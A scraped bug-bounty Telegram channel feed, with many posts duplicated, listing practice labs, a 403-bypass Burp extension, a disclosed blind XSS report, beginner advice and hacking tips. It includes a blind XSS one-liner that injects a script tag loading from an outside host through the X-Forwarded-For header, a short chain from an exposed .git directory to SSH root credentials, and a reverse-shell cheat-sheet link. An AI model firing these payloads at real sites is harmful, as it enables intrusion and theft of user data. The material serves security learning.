URL://
1. https://hackxpert.com/labs/RXSS/GET/
2. https://hackxpert.com/labs/SXSS/
by
@theXSSrat
More : :🧵1/n 👇
1. https://hackxpert.com/labs/RXSS/GET/
2. https://hackxpert.com/labs/SXSS/
by
@theXSSrat
More : :🧵1/n 👇
URL://
https://sourceforge.net/projects/owaspbwa/
IT's Machine
Contains Many 9-10 Different Labs
by :
@owasp
More :🧵6/n 👇
https://sourceforge.net/projects/owaspbwa/
IT's Machine
Contains Many 9-10 Different Labs
by :
@owasp
More :🧵6/n 👇
SourceForge
OWASP Broken Web Applications Project
Download OWASP Broken Web Applications Project for free. Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with…
👍1
Feel Free To ADD More Lab
Follow Me For More Resources Related to cybersecurity
Follow Me For More Resources Related to cybersecurity
An burpsuite extension to bypass 403 restricted directory.
By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.
URL://
https://github.com/sting8k/BurpSuite_403Bypasser
Tags:
#cybersecurity #bugbounty #bugbountytip
By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.
URL://
https://github.com/sting8k/BurpSuite_403Bypasser
Tags:
#cybersecurity #bugbounty #bugbountytip
GitHub
GitHub - sting8k/BurpSuite_403Bypasser: Burpsuite Extension to bypass 403 restricted directory
Burpsuite Extension to bypass 403 restricted directory - sting8k/BurpSuite_403Bypasser
❤2
Blind XSS in app.pullreport.com████████ via /reviews/ratings/{uuid}
URL://
https://hackerone.com/reports/1558010
Tags:
#cybersecurity #hacking #bugbounty #bugbountytips #infosec #cybersec #blind_xss #xss
URL://
https://hackerone.com/reports/1558010
Tags:
#cybersecurity #hacking #bugbounty #bugbountytips #infosec #cybersec #blind_xss #xss
HackerOne
HackerOne disclosed on HackerOne: Blind XSS in...
**Summary:**
Hi,
While researching PullRequest yesterday, I saw some "review" endpoints in web archive of "app.pullrequest.com"....
Hi,
While researching PullRequest yesterday, I saw some "review" endpoints in web archive of "app.pullrequest.com"....
👍2
Bug Bounty Tips
Explanation : What tool you can use for for whatever bug is it
Credit: Patrik
URL://
https://blog.it-securityguard.com/pbbt.png
Tags:
#cybersecurity #bugbounty #bugbountytips #hacking #security #offsec
Explanation : What tool you can use for for whatever bug is it
Credit: Patrik
URL://
https://blog.it-securityguard.com/pbbt.png
Tags:
#cybersecurity #bugbounty #bugbountytips #hacking #security #offsec
How to find & access Admin Panel by digging into JS files… https://medium.com/@ratnadip1998/how-to-find-access-admin-panel-by-digging-into-js-files-282d89391a2d
Medium
How to find & access Admin Panel by digging into JS files…🥰
Hello All,🙂
🔥2
~Pwning
1. Recon = Found log file: web/path/wget-log
2. Found Server IP in the logs file
3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/
4. git status & found backup zip file
5. While reading files found: app/file.php disclosing SSH root Credentials
6. RCE
1. Recon = Found log file: web/path/wget-log
2. Found Server IP in the logs file
3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/
4. git status & found backup zip file
5. While reading files found: app/file.php disclosing SSH root Credentials
6. RCE
Awesome Write-Ups And POCs🌵
Link :🔗
https://resource.dr4cun0.com
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
Look😃🔥
Link :🔗
https://resource.dr4cun0.com
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
Look😃🔥
👍4
Guide for Beginner and Intermediate in Bug bounty
- Learn HTML.
Learning html is needed because as a bug bounty hunter you need this as if you are hunting on websites.
- Do a project on website development.
This will give you a good understanding of website and how website really works and functions
As of now You have good understanding of websites
- Do Learn/Practice as much you can on OWASP TOP 10, basically it contains top 10 trending vulnerability in the current year
- Go And Read Bug Reports :
This will give you an understanding of how you need to think as bug bounty hunter : https://twitter.com/Aacle_/status/1556301856317788160?s=20&t=yw73u2K7J50lrkT_JwMCVg
As a hacker you need to think like a hacker then you will be able to become a good and professional bug bounty hunter
Now it's time to try in real world so, register on any bug bounty program like hackerone, bugcrowd like that and choose any target not any but choose organization in which you will have a great chance to find bugs in beginning.
Now Best of Luck👍 & Work Hard
If you like then please share the channel like with your friends
https://t.me/updatedwithCybersecurity
- Learn HTML.
Learning html is needed because as a bug bounty hunter you need this as if you are hunting on websites.
- Do a project on website development.
This will give you a good understanding of website and how website really works and functions
As of now You have good understanding of websites
- Do Learn/Practice as much you can on OWASP TOP 10, basically it contains top 10 trending vulnerability in the current year
- Go And Read Bug Reports :
This will give you an understanding of how you need to think as bug bounty hunter : https://twitter.com/Aacle_/status/1556301856317788160?s=20&t=yw73u2K7J50lrkT_JwMCVg
As a hacker you need to think like a hacker then you will be able to become a good and professional bug bounty hunter
Now it's time to try in real world so, register on any bug bounty program like hackerone, bugcrowd like that and choose any target not any but choose organization in which you will have a great chance to find bugs in beginning.
Now Best of Luck👍 & Work Hard
If you like then please share the channel like with your friends
https://t.me/updatedwithCybersecurity
🔥3👍1
Best Specification laptop/pc for Penetration tester
#bugbounty #hacking #infosec #cybersecurity
Processor : It should have atleast 6 core and 8 thread
Ram : At least 8 gb ram but I'll recommend 16 gb because you have to use different type of VMs in your laptop/pc
Storage : Give most priority to SSD because of much faster than HDD & that's why it makes your pc fast
Graphic : At least 2 gb of graphic card must needed for process like brute forcing.
If your pc have at least above specification than you are all set
Thank you For Reading 😃
You can join my telegram group if you want : https://t.me/bugbountyresources
#bugbounty #hacking #infosec #cybersecurity
Processor : It should have atleast 6 core and 8 thread
Ram : At least 8 gb ram but I'll recommend 16 gb because you have to use different type of VMs in your laptop/pc
Storage : Give most priority to SSD because of much faster than HDD & that's why it makes your pc fast
Graphic : At least 2 gb of graphic card must needed for process like brute forcing.
If your pc have at least above specification than you are all set
Thank you For Reading 😃
You can join my telegram group if you want : https://t.me/bugbountyresources
Telegram
Bug Bounty
Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •
👍2
Blind XSS In X-Forwarded-For Header #bugbounty
subfinder -d http://target.com
| gau | bxss -payload '"><script src=https://hacker.xss.ht
></script>' -header "X-Forwarded-For"
#bugbountytips #infosec #cybersecurity
If you love it, you can join by channel : https://t.me/bugbountyresources
subfinder -d http://target.com
| gau | bxss -payload '"><script src=https://hacker.xss.ht
></script>' -header "X-Forwarded-For"
#bugbountytips #infosec #cybersecurity
If you love it, you can join by channel : https://t.me/bugbountyresources
👍6
Get Reverse Shell
Using Bash, Netcat(Window & Kali), Netcat(Without -e Option), Python, Perl, Php
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
Using Bash, Netcat(Window & Kali), Netcat(Without -e Option), Python, Perl, Php
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
❤1
Bypass 304 (Not Modified #bugbountytip
Request :
GET /admin HTTP/1.1
Host: http://target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete "If-None-Match" header
➡Adding random character in the end of "If-None-Match" header
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty
Request :
GET /admin HTTP/1.1
Host: http://target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete "If-None-Match" header
➡Adding random character in the end of "If-None-Match" header
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍3